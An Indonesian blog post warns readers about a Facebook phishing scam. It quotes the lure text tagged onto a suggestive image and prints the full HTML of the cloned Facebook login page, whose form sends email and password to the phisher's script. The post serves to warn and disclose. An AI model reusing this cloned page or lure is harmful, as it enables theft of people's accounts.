Home > Blogosphere, World Of ICT > Modus penipuan untuk mendapatkan Akun FB

Modus penipuan untuk mendapatkan Akun FB


Saya ingin sedikit bercerita mengenai kejadian yang saya alami siang ini,  ketika tadi sedang browsing dan mencari bahan untuk ujian PSSI nanti malam saya sempatkan untuk online dan melihat akun facebook saya, rupanya diantara sekian banyak  status yang diposting dari friendlist saya, tiba-tiba muncul sebuah gambar seorang ABG yang berpakaian minim dan gambar ini di tag kepada salah satu friendlist saya sehingga secara otomatis tagging gambar tersebut muncul di halaman wall facebook saya  meskipun tidak langsung bertautan dengan orang yang men’tag’ gambar tersebut.

OK, sampai disini saya langsung curiga dan penasaran apa maksud dan tujuan dari orang tersebut sehingga menshare gambar ABG tadi ke beberapa friendlist yang dia miliki, padahal kalau dia mau konsumsi gambar  tadi mustinya tidak dia publish melalui jalur umum yang notabene-nya semua pasti melihat, asumsi awal saya adalah bahwa akun orang tersebut sudah dibajak. Next selanjutnya saya ingin membuktikan informasi apa saja yang disampaika pada gambar tersebut.

Hmm. sampai disini kecurigaan saya semakin kuat setelah membaca informasi berikut pada bagian bawah gambar;

VIDEO MESUM ANAK SMA NEGRI 1 SEMARANG,MERUSAK TABIAT GENERASI MUDA DAN MENCORENG NAMA BAIK BANGSA INDONESIA…!!! UNTUK MELIHAT VIDEO FAKTA INI SILAHKAN KLIK www.fatimahdp.web.id

Rupanya orang yang men’tag’ gambar ini juga memberitahukan alamat video lengkap untuk membuka informasi selengkapnya  tentang si ABG ini pada alamat  www.fatimahdp.web.id , OK saya langsung meluncur ke TeKape untuk memastikan bagaimana modus penipuan selanjutnya. Apabila anda buka alamat web inimaka akan muncul sebuah halaman baru yang persis tampilannya dengan halaman login Facebook
Sampai disini bagi orang yang sangat penasaran dan ingin menyaksikan video tersebut pasti dia tidak akan berpanjang lebar dan langsung serta merta memasukkan login user dan password facebook yang dimilikinya, padahal web ini adalah web login facebook yang palsu, hanya menyerupai saja, apabila kita lihat source code dari domain ini (terlihatdibawah)
<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="Ysxe";</script><noscript> <meta http-equiv="refresh" content="0; URL=/login.php?_fb_noscript=1" /> </noscript>
<meta name="robots" content="noodp,noydir" /><meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." /><link rel="alternate" media="handheld" href="http://www.facebook.com/login.php" />
<title>Log In | Facebook</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/OP7-abKqxUl.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/svonORc8tTu.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/ejLIIb8vBQK.css" />

    <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/gHQ_iB0-ppQ.js"></script>

  <script type="text/javascript">window.Bootloader && Bootloader.done(["E\/nsO"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="login_page UIPage_LoggedOut ff4 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="blueBarHolder" class="loggedOut"><div id="blueBar"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div></div></div><div id="globalContainer"><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">Facebook Login</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="login_form_container"><form method="get" action="next.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="uVGuX" autocomplete="off" /><div id="loginform" style=""><input type="hidden" autocomplete="off" id="return_session" name="return_session" value="0" /><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="1" /><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="session_key_only" name="session_key_only" value="0" /><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1" /><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" autocomplete="off" id="lsd" name="lsd" value="uVGuX" /><div class="form_row clearfix "><label for="email" id="label_email" class="login_form_label">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="formchange()" /></div><div class="form_row clearfix "><label for="pass" id="label_pass" class="login_form_label">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div><div class="persistent"><div class="uiInputLabel" id="persist_label"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelCheckbox" /><label for="persist_box">Keep me logged in</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0" /><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label><div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" for="unhbna_1"><input value="Log In" name="login" onclick="" type="submit" id="unhbna_1" /></label></div><div id="register_link">or <strong><a href="http://www.facebook.com/r.php?possible_fb_user=1&amp;is_enabled=1&amp;next=&amp;locale=en_US" target="_blank" rel="nofollow" id="reg_btn_link" tabindex="-1">Sign up for Facebook</a></strong></div></div><p class="reset_password form_row"><a href="http://www.facebook.com/recover.php?locale=en_US" target="" tabindex="-1">Forgot your password?</a></p></div></form>
</div></div></div><ul class="uiList uiListHorizontal clearfix ptm localeSelectorList"><li class="uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://id-id.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;id_ID&quot;, &quot;http:\/\/id-id.facebook.com\/login.php&quot;);" title="Indonesian">Bahasa Indonesia</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://www.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;en_US&quot;, &quot;http:\/\/www.facebook.com\/login.php&quot;);" title="English (US)">English (US)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://es-la.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;es_LA&quot;, &quot;http:\/\/es-la.facebook.com\/login.php&quot;);" title="Spanish">Español</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://pt-br.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;http:\/\/pt-br.facebook.com\/login.php&quot;);" title="Portuguese (Brazil)">Português (Brasil)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://fr-fr.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;fr_FR&quot;, &quot;http:\/\/fr-fr.facebook.com\/login.php&quot;);" title="French (France)">Français (France)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://de-de.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;de_DE&quot;, &quot;http:\/\/de-de.facebook.com\/login.php&quot;);" title="German">Deutsch</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://it-it.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;it_IT&quot;, &quot;http:\/\/it-it.facebook.com\/login.php&quot;);" title="Italian">Italiano</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="rtl" href="http://ar-ar.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;ar_AR&quot;, &quot;http:\/\/ar-ar.facebook.com\/login.php&quot;);" title="Arabic">العربية</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://hi-in.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;hi_IN&quot;, &quot;http:\/\/hi-in.facebook.com\/login.php&quot;);" title="Hindi">हिन्दी</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a dir="ltr" href="http://zh-cn.facebook.com/login.php" onclick="intl_set_cookie_locale(&quot;zh_CN&quot;, &quot;http:\/\/zh-cn.facebook.com\/login.php&quot;);" title="Simplified Chinese (China)">中文(简体)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a class="showMore" rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Flogin.php&amp;source=TOP_LOCALES_DIALOG" title="Show more languages">…</a></li></ul></div></div><div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div class="mrl lfloat" role="contentinfo"><div class="fsm fwn fcg"><span> Facebook © 2011</span></div></div><div class="navigation fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile/?ref=pf" title="Check out Facebook Mobile.">Mobile</a> · <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> · <a href="http://www.facebook.com/badges/?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> · <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> · <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> · <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> · <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Advertising</a> · <a href="http://www.facebook.com/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> · <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> · <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> · <a href="http://www.facebook.com/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a> · <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Review our terms of service.">Terms</a> · <a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=3958"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","\/pages\/","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 ");}catch(e){si_cj("1 \t");window.document.write("\u003cstyle>body * {display:none !important;}\u003c\/style>\u003ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">\u003ci class=\"img sp_a0bwqr sx_582856\" style=\"display:block !important\">\u003c\/i>Go to Facebook.com\u003c\/a>");/*K3GySP7j*/}}/*]]>*/</script><script type="text/javascript">
Env={user:"0",locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:466994,vip:"69.171.228.13",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"AQAe--wA",ajaxpipe_token:"AXiWVyitHh1S-k3q",lhsh:"tAQFRHWQk",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",ffid1:"VQZgSNUFxQrXnWM3F4c_wQ",ffid2:"Ega1uAak_cOJLLgWmwz8eg",ffid3:"QTNxZFRrRFNia1h1UU9XdU82V3FndEpr",ffid4:"xH2EoqCzMnhUyeS-kZuEIQ",ffver:63083};

</script>
<script type="text/javascript">Bootloader.setResourceMap({"Gg4x\/":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yW\/r\/OP7-abKqxUl.css"},"TQX3G":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yt\/r\/svonORc8tTu.css"},"yq2QT":{"type":"css","permanent":1,"nonblocking":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yZ\/r\/ejLIIb8vBQK.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yv\/r\/hp5wzJz00Hs.css"},"uMKVV":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yK\/r\/O5YNdZEjoDb.css"}});Bootloader.setResourceMap({"7IREj":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yn\/r\/bMfYOdYTCNV.js"},"iVV76":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yu\/r\/O03OuHGGSjF.js"},"E\/nsO":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yq\/r\/gHQ_iB0-ppQ.js"},"pHTGh":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/_4LsD6-sXkn.js"},"Ull01":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yw\/r\/yt8IGuylB-z.js"},"pzflD":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yl\/r\/zsEkFNidnqn.js"},"btJri":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yT\/r\/ZEs8VcMBULN.js"},"fC5IV":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yw\/r\/94adiW_Rdpz.js"},"uKqhc":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yK\/r\/xrEeXUiCo9E.js"}});
Bootloader.enableBootload({"async":["E\/nsO","7IREj","Gg4x\/"],"dialog":["E\/nsO","7IREj","Gg4x\/"],"iframe-shim":["E\/nsO","7IREj","pHTGh"],"maxlength-form-listener":["E\/nsO","7IREj"],"dom-form":["E\/nsO","7IREj","Gg4x\/"],"PhotoTheater":["E\/nsO","7IREj","Gg4x\/","pHTGh"],"PhotoTagger":["E\/nsO","7IREj","Gg4x\/"],"TagToken":["E\/nsO","7IREj","pHTGh"],"TagTokenizer":["E\/nsO","7IREj","pHTGh","Gg4x\/","Ull01"],"fb-photos-theater-css":["\/YYg5"],"dom":["E\/nsO","7IREj"],"dom-html":["E\/nsO","7IREj"],"error-signal":["E\/nsO","7IREj","pzflD"],"animation":["E\/nsO","7IREj"],"hovercard":["Gg4x\/","E\/nsO","7IREj"],"live-js":["E\/nsO","btJri","7IREj"],"photocrop2":["E\/nsO","7IREj","uMKVV","pHTGh"],"fb-photos-photo-css":["Gg4x\/"],"fb-photos-snowbox-css":["Gg4x\/"],"video-rotate-snowbox":["E\/nsO","7IREj","Gg4x\/","fC5IV"],"json":["7IREj"],"dom-collect":["7IREj","uKqhc"],"PhotoSnowbox":["E\/nsO","7IREj","Gg4x\/","Ull01"],"Toggler":["E\/nsO","7IREj","Gg4x\/"],"dom-scroll":["E\/nsO","7IREj"],"ajaxpipe":["E\/nsO","7IREj","Gg4x\/"],"async-signal":["E\/nsO","7IREj"],"dimension-tracking":["E\/nsO","7IREj"],"detect-broken-proxy-cache":["E\/nsO","7IREj"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function() {InitialJSLoader.load(["7IREj","iVV76"]);Arbiter.inform("BOOTLOAD\/ROADRUNNER_READY", true, Arbiter.BEHAVIOR_STATE);}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);</script><script type="text/javascript">
Bootloader.configurePage(["Gg4x\/","TQX3G","yq2QT"]);
Bootloader.done(["yZtFc"]);

onloadRegister(function (){if (FbDesktopDetect.isPluginInstalled()) { $("persist_box").checked = true; CSS.hide("persist_label");}});
onloadRegister(function (){window.loading_page_chrome = true;});
onloadRegister(function (){window.intl_locale_rewrites = {"meta":{"\/_B\/":"^(.*[.,!?\\s]|)","\/_E\/":"([.,!?\\s].*|)$"},"patterns":{"\/\u0001(.*)('|')s\u0001(?:'|')s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/e":"mb_strtolower(\"\u0001$1\u0001\")","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}};});
onloadRegister(function (){window.loading_page_chrome = false;});
onloadRegister(function (){useragent();});
onafterloadRegister(function (){Bootloader.loadComponents(["dimension-tracking"], function(){  });});
onafterloadRegister(function (){Bootloader.loadComponents(["detect-broken-proxy-cache"], function(){ detect_broken_proxy_cache("0", "c_user") });});
</script><script type="text/javascript">if(!window.ge)window.ge=function(a){return document.getElementById(a);};window.onload=function(a){return function(){var b=ge('email'),c=ge('pass');try{if(b&&!b.value){b.focus();}else if(c)c.focus();}catch(d){if(!(d.number==-2146826178))throw d;}return a&&a.call(window);};}(window.onload);function formchange(){(ge('persistent')||{}).checked=0;}function pop(a){window.open(a);}function reload_on_new_cookie(a){if(getCookie('c_user')||getCookie('csm'))window.location=a;}function begin_polling_login_cookies(a){setInterval(function(){reload_on_new_cookie(a);},5000);}
</script></body>
</html>
Maka bisa ditebak bahwa ini bukanlah halaman facebook, namun adalah aplikasi PHISING akun  password facebook. Dan efeknya adalah apabila anda sempat mengetikkan parameter user dan password maka aplikasi ini akan mencatat informasi tersebut,  SAY GOOD BY deh , akun FB anda  telah cuma-cuma anda berikan  kepada orang yang buat aplikasi ini, informasi pribadi, email, data rahasia, pastinya akan digunakan oleh orang yang tidak bertanggun jawab tersebut.
SO. WASPADALAH…WASPADALAH…
UPDATE SORE: Rupanya domain fatimah yang digunakan untuk Phising (hosting di Inmedia) sudah di banned sama adminnya, syukurlah mudah-mudahan tidak ada lagi yang terjebak akun phising.
  1. mr
    May 27, 2012 at 3:37 am

    thanks

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: